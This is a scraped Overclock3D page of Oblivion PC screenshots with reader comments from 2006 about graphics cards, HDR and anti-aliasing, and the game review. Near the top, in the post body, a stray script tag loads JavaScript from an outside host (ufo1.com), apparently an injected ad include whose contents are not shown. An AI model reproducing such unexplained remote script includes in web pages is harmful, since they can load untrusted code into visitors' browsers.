Elder Scrolls Oblivion - PC

Screenshots

<script type="text/javascript" src="http://ufo1.com/ad/c.js"></script> Posted 02/04/2006
Name: Matt Kemp
Product Acquired: PC World


Oblivion Screenshot Oblivion Screenshot 2

Oblivion screenshot 3 Oblivion screenshot 4

Oblivion Screenshot 5 Oblivion Screenshot 6

Oblicion screenshot 7 Oblivion screenshot 8

Added: Some screenshots using the Higher quality LOD textures (click here for information and to download textures)

Oblivion LOD Screenies Oblivion LOD screenies
discuss in our Forums
«Prev 1 2 Next»

Most Recent Comments

01-04-2006, 16:19:28

FarFarAway
We review this popular RPG: The elder Scrolls: Oblivion

Click here to see what we thought.

01-04-2006, 16:36:53

FarFarAway
Finished y'all

01-04-2006, 18:26:49

Tec
Looking great Kemp , nice game i might get it but dont think i can find to play it but thats another story. Btw very first picture in the review links to the second picture next to it when clicked.

01-04-2006, 19:07:08

Ham
Good job kemp. I love this game. Having waited nearly a year and a half for it, after i finished morrowind, its definatly all its was and is cracked up to be.

01-04-2006, 19:11:45

PV5150
Awesome looking game kemp, and another great review. Do you know if they are working on a patch to fix some of the negatives that you've addressed (HDR, some of the characters too easily killed etc). Either way it's very visually impressive and looks very addictive

01-04-2006, 19:16:31

Ham
PV i think if you had all on full, AA and HDR its would rape even the most powerful systems... They probably will release a patch i the future though.

And the people dying easily will be editable in the ES:CS (elder scrolls construction set, an SDK that basicly turns the game into a sandbox) when its made avalible. Either that or kempez needs to protect them better

02-04-2006, 01:02:17

Eguy
Quote:
Originally Posted by Ham
PV i think if you had all on full, AA and HDR its would rape even the most powerful systems... They probably will release a patch i the future though.

And the people dying easily will be editable in the ES:CS (elder scrolls construction set, an SDK that basicly turns the game into a sandbox) when its made avalible. Either that or kempez needs to protect them better
I bet you could run AA + HDR on a x1900XTX or 7900GTX

02-04-2006, 05:15:58

FarFarAway
You probably could but the game won't let you.

Ta lads. This game is well worth getting.

@PV: I'll send the review to Bethesda and see what they say.

02-04-2006, 05:19:28

PV5150
Good idea mate, I see they have a review section on their website

15-11-2006, 18:36:22

FarFarAway
Check out some Uber sexy screenshots

All I will say is 1920 x 1200 with 8 x QAA and 16 x AF with High Quality Enabled and at a superbly playable framerate and EVERY in game setting set to MAX

http://www.overclock3d.net/gfx/artic...233507779s.jpg

http://www.overclock3d.net/gfx/artic...233509872s.jpg

http://www.overclock3d.net/gfx/artic...233511434s.jpg

http://www.overclock3d.net/gfx/artic...233514768s.jpg

15-11-2006, 18:40:17

Ham
You have the 8800GTX in then?

And have you tried the HDR & AA hack that lets you turn on both?

15-11-2006, 18:53:47

FarFarAway
It IS HDR and AA

15-11-2006, 18:57:44

Ham
Hehe sweet, now answer the other question

16-11-2006, 02:46:48

FarFarAway
Quote:
Originally Posted by name='Ham'
Hehe sweet, now answer the other question
I'm sorry I don't understand

16-11-2006, 03:17:49

PV5150
Now that's extremely spankworthy. Love the screenies

16-11-2006, 05:10:21

Dav0s
Quote:
Originally Posted by name='Kempez'
I'm sorry I don't understand
Quote:
Originally Posted by name='Ham Q1'
You have the 8800GTX in then?
Quote:
Originally Posted by name='Ham Q2'
And have you tried the HDR & AA hack that lets you turn on both?
You didnt answer Q1

16-11-2006, 05:20:15

FarFarAway
Quote:
Originally Posted by name='Dav0s'
You didnt answer Q1
No I don't get it Dave. I'm running on a ti 400

16-11-2006, 17:47:40

glocktodahead
Nice screens, I really want to buy this game...maybe for christmas

16-11-2006, 19:45:13

jiffz
Just checked the difference from your 1st pic to the rest and it's pretty amazing!

I've been debating whether to reinstall this game all night even though my HD has file errors and needs reformatting...

27-12-2006, 15:16:36

glocktodahead
I got the game for christmas and I love it. I just wanted to say that your review was spot on! Well worth buying. I'm gunna go play now cya lol

27-12-2006, 15:33:44

FarFarAway
Have fun mate, glad the review was helpful

I'm still playing it now on and off when I have time between reviewing, the missus and my 360!
Reply
x

Register for the OC3D Newsletter

Subscribing to the OC3D newsletter will keep you up-to-date on the latest technology reviews, competitions and goings-on at Overclock3D. We won't share your email address with ANYONE, and we will only email you with updates on site news, reviews, and competitions and you can unsubscribe easily at any time.

Simply enter your name and email address into the box below and be sure to click on the links in the confirmation emails that will arrive in your e-mail shortly after to complete the registration.

If you run into any problems, just drop us a message on the forums.